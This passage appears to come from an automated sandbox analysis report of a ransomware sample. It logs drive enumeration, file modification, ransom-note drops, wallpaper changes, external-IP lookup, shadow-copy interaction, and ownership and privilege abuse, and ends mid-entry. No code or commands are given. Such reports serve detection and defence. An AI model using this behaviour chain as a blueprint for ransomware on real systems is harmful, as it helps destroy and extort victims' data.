C:\Users\Admin\Music\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Libraries\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Videos\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Desktop\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Pictures\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Downloads\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe -
Enumerates connected drives 3 TTPs 44 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe5E68lMYn64.exedescription ioc process File opened (read-only) \??\L: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\I: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\K: 5E68lMYn64.exe File opened (read-only) \??\L: 5E68lMYn64.exe File opened (read-only) \??\X: 5E68lMYn64.exe File opened (read-only) \??\O: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\V: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\N: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\M: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\E: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\T: 5E68lMYn64.exe File opened (read-only) \??\X: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\P: 5E68lMYn64.exe File opened (read-only) \??\Q: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\A: 5E68lMYn64.exe File opened (read-only) \??\I: 5E68lMYn64.exe File opened (read-only) \??\J: 5E68lMYn64.exe File opened (read-only) \??\W: 5E68lMYn64.exe File opened (read-only) \??\Y: 5E68lMYn64.exe File opened (read-only) \??\Z: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\M: 5E68lMYn64.exe File opened (read-only) \??\O: 5E68lMYn64.exe File opened (read-only) \??\R: 5E68lMYn64.exe File opened (read-only) \??\S: 5E68lMYn64.exe File opened (read-only) \??\V: 5E68lMYn64.exe File opened (read-only) \??\S: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\J: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\N: 5E68lMYn64.exe File opened (read-only) \??\R: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\T: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\E: 5E68lMYn64.exe File opened (read-only) \??\G: 5E68lMYn64.exe File opened (read-only) \??\U: 5E68lMYn64.exe File opened (read-only) \??\Y: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\U: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\P: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\K: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\H: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\G: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\B: 5E68lMYn64.exe File opened (read-only) \??\H: 5E68lMYn64.exe File opened (read-only) \??\W: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\Z: 5E68lMYn64.exe File opened (read-only) \??\Q: 5E68lMYn64.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 135 myexternalip.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\MoyG9L18.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
Processes:
941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exedescription ioc process File opened for modification C:\Program Files\Java\jre-1.8\lib\jsse.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\psfont.properties.ja 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\unlimited\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\error_window.html 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\santuario.md 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\flavormap.properties 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\UnblockClear.cfg 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\ui.js 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\cmm\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\SmallLogoBeta.png 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\browse_window.html 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\javaw.exe 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\http.luac 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\directshow.md 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\vlc.mo 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\ktab.exe 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\tzmappings 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\java.security 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jdeps.exe 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\jquery.jstree.js 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\libpng.md 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\public_suffix.md 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\jconsole.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\id.pak 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_fr.properties 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Mozilla Firefox\installation_telemetry.json 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages_es.properties 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\xalan.md 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jstatd.exe 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\dnsns.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\jfr\default.jfc 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\giflib.md 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_zh_HK.properties 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_ja.properties 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\LogoBeta.png 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lo\LC_MESSAGES\vlc.mo 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\javacpl.exe 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\public_suffix_list.dat 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\cmm\CIEXYZ.pf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_ko.properties 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\ext\sunmscapi.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Mozilla Firefox\omni.ja 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vlc.mo 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\ffjcext.zip 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\zh-TW.pak 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\common.luac 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\sound.properties 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\relaxngcc.md 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\US_export_policy.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\vlc.mo 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jre-1.8\lib\security\policy\limited\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\gstreamer.md 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\amd64\jvm.cfg 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\javafx.properties 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\vlc.mo 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\cmm\sRGB.pf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
cmd.exe5E68lMYn.exetakeown.exe5E68lMYn.execmd.execmd.execacls.exetakeown.exe5E68lMYn.execmd.execacls.exe5E68lMYn.exetakeown.exe5E68lMYn.execacls.exe5E68lMYn.exewscript.exe5E68lMYn.exetakeown.execmd.execacls.exe5E68lMYn.exetakeown.execmd.execmd.execmd.exe5E68lMYn.execacls.execmd.exetakeown.exetakeown.execacls.exetakeown.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5E68lMYn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5E68lMYn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5E68lMYn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5E68lMYn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5E68lMYn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5E68lMYn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5E68lMYn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5E68lMYn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5E68lMYn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 7304 vssadmin.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.exe5E68lMYn64.exepid process 3156 powershell.exe 3156 powershell.exe 3156 powershell.exe 5068 5E68lMYn64.exe 5068 5E68lMYn64.exe 5068 5E68lMYn64.exe 5068 5E68lMYn64.exe 5068 5E68lMYn64.exe 5068 5E68lMYn64.exe 5068 5E68lMYn64.exe 5068 5E68lMYn64.exe 5068 5E68lMYn64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
5E68lMYn64.exepid process 5068 5E68lMYn64.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exetakeown.exe5E68lMYn64.exevssvc.exeWMIC.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exedescription pid process Token: SeDebugPrivilege 3156 powershell.exe Token: SeTakeOwnershipPrivilege 4148 takeown.exe Token: SeDebugPrivilege 5068 5E68lMYn64.exe Token: SeLoadDriverPrivilege 5068 5E68lMYn64.exe Token: SeBackupPrivilege 7240 vssvc.exe Token: SeRestorePrivilege 7240 vssvc.exe Token: SeAuditPrivilege 7240 vssvc.exe Token: SeIncreaseQuotaPrivilege 7664 WMIC.exe Token: SeSecurityPrivilege 7664 WMIC.exe Token: SeTakeOwnershipPrivilege 7664 WMIC.exe Token: SeLoadDriverPrivilege 7664 WMIC.exe Token: SeSystemProfilePrivilege 7664 WMIC.exe Token: SeSystemtimePrivilege 7664 WMIC.exe Token: SeProfSingleProcessPrivilege 7664 WMIC.exe Token: SeIncBasePriorityPrivilege 7664 WMIC.exe Token: SeCreatePagefilePrivilege 7664 WMIC.exe Token: SeBackupPrivilege 7664 WMIC.exe Token: SeRestorePrivilege 7664 WMIC.exe Token: SeShutdownPrivilege 7664 WMIC.exe Token: SeDebugPrivilege 7664 WMIC.exe Token: SeSystemEnvironmentPrivilege 7664 WMIC.exe Token: SeRemoteShutdownPrivilege 7664 WMIC.exe Token: SeUndockPrivilege 7664 WMIC.exe Token: SeManageVolumePrivilege 7664 WMIC.exe Token: 33 7664 WMIC.exe Token: 34 7664 WMIC.exe Token: 35 7664 WMIC.exe Token: 36 7664 WMIC.exe Token: SeIncreaseQuotaPrivilege 7664 WMIC.exe Token: SeSecurityPrivilege 7664 WMIC.exe Token: SeTakeOwnershipPrivilege 7664 WMIC.exe Token: SeLoadDriverPrivilege 7664 WMIC.exe Token: SeSystemProfilePrivilege 7664 WMIC.exe Token: SeSystemtimePrivilege 7664 WMIC.exe Token: SeProfSingleProcessPrivilege 7664 WMIC.exe Token: SeIncBasePriorityPrivilege 7664 WMIC.exe Token: SeCreatePagefilePrivilege 7664 WMIC.exe Token: SeBackupPrivilege 7664 WMIC.exe Token: SeRestorePrivilege 7664 WMIC.exe Token: SeShutdownPrivilege 7664 WMIC.exe Token: SeDebugPrivilege 7664 WMIC.exe Token: SeSystemEnvironmentPrivilege 7664 WMIC.exe Token: SeRemoteShutdownPrivilege 7664 WMIC.exe Token: SeUndockPrivilege 7664 WMIC.exe Token: SeManageVolumePrivilege 7664 WMIC.exe Token: 33 7664 WMIC.exe Token: 34 7664 WMIC.exe Token: 35 7664 WMIC.exe Token: 36 7664 WMIC.exe Token: SeTakeOwnershipPrivilege 5416 takeown.exe Token: SeTakeOwnershipPrivilege 2040 takeown.exe Token: SeTakeOwnershipPrivilege 7192 takeown.exe Token: SeTakeOwnershipPrivilege 7564 takeown.exe Token: SeTakeOwnershipPrivilege 4540 takeown.exe Token: SeTakeOwnershipPrivilege 7276 takeown.exe Token: SeTakeOwnershipPrivilege 7600 takeown.exe Token: SeTakeOwnershipPrivilege 7744 takeown.exe Token: SeTakeOwnershipPrivilege 8128 takeown.exe Token: SeTakeOwnershipPrivilege 1768 takeown.exe Token: SeTakeOwnershipPrivilege 2332 takeown.exe Token: SeTakeOwnershipPrivilege 4616 takeown.exe Token: SeTakeOwnershipPrivilege 2992 takeown.exe Token: SeTakeOwnershipPrivilege 2232 takeown.exe Token: SeTakeOwnershipPrivilege 5960 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.execmd.execmd.execmd.exewscript.execmd.execmd.execmd.execmd.exe5E68lMYn.execmd.exedescription pid process target process PID 3108 wrote to memory of 2864 3108 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 3108 wrote to memory of 2864 3108 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 3108 wrote to memory of 2864 3108 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 3108 wrote to memory of 648 3108 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe NWYsCRGT.exe PID 3108 wrote to memory of 648 3108 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe NWYsCRGT.exe PID 3108 wrote to memory of 648 3108 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe NWYsCRGT.exe PID 3108 wrote to memory of 5044 3108 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 3108 wrote to memory of 5044 3108 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 3108 wrote to memory of 5044 3108 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 5044 wrote to memory of 3156 5044 cmd.exe powershell.exe PID 5044 wrote to memory of 3156 